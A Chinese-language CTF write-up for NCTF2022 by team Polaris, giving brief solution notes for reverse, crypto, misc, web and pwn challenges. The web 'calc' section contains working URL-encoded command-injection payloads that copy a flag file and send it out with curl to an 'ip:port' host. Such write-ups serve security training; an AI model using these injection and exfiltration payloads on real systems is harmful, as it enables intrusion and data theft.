NCTF2022–Polaris战队–WP

reverse

Cyberpunk

a=open("/ata0a/flag",7)  tmpHeap=malloc(0x100)  read(5,tmpHeap,0x100)  xor(tmpHeap,81) d tmpHeap

Ccccha

ez_rev

四个字节一组进行运算，最后手推出来两个一模一样的二元一次方程

z3求解

just run it

逆推出映射转化关系，写出逆转换函数，将正确的box逆转换，再和box2 异或，再逆转换既可得到正确的key

得到争取的key W1lc0menctf2o2o!

动调推出下面为SM4

其中最后sm4解密用的是在线解密

Crypto

signin

1. MTP攻击后校正

2.通过异或获得完整信息

Coloratura

随机数回溯恢复SourceImg（不足补零）

异或得到flag

dp_promax

dp_promax _revenge里有提示，factordb上可查

misc

只因因

使用提及的blast工具，可以找到基因为"CTFR"，然后md5加密即可。

Signin

炉边聚会

学习链接

https://ds.163.com/article/5e3b84198ec3321d7c00fe8e

https://zhangshuqiao.org/2018-12/炉石卡组代码解析/

里面有现成的脚本，拼接起来，替换掉strings输出即可

其实后面就卡住了，但是注意到每个卡组数字是一，然后前两个是780和670

就是除以10然后正常拼接就行，字数不多可以手撕

qrssssssss

二维码批量识别，https://tl.beer/parseqrcode.html

按时间递增排序，然后对文本进行稍稍处理一下：

括号内的内容是26个，其实基本都能确定了，剩下的可以多次试一试就找到了：

NCTF{737150-eeb-465-e91-110a8fb}

qrssssssss_revenge

这个题目按照时间、文件大小排序都没有很好的效果，但是有HINT：LMQH

所以这个题目是要按照纠错等级进行分布，恰好，QR RESEARCH支持这个功能，还是括号内26个字

母，手撕开始：

然后按照掩码从0开始进行顺序拼接：

Signout

web

calc

这题是半个原题，过滤了# ,但是没过滤' ,通过'''来闭合，进而执行命令

开始尝试了curl外带，但/flag不存在，由于是公网环境，读tmp/log.txt发现里面有根目录，就看到了

flag名字Th1s_is__F1114g ,但还是读不了flag，因为名字里面有过滤字符

采取的办法，cp来绕过

/calc?num=%27%27%271%27%0acp%09/T*%09/1.txt%0a%273%27%27%27

然后通过curl外带数据

/calc?num=%27%27%271%27%0acurl%09-T%09/1.txt%09ip:port%0a%273%27%27%27

参考文章

https://xiaolong22333.top/index.php/archives/140/

pwn

babyLinkedList

ezlink

ezshellcode

文末:

欢迎各位师傅加入我们:

星盟安全团队纳新群QQ:222328705

有兴趣的师傅欢迎一起来讨论!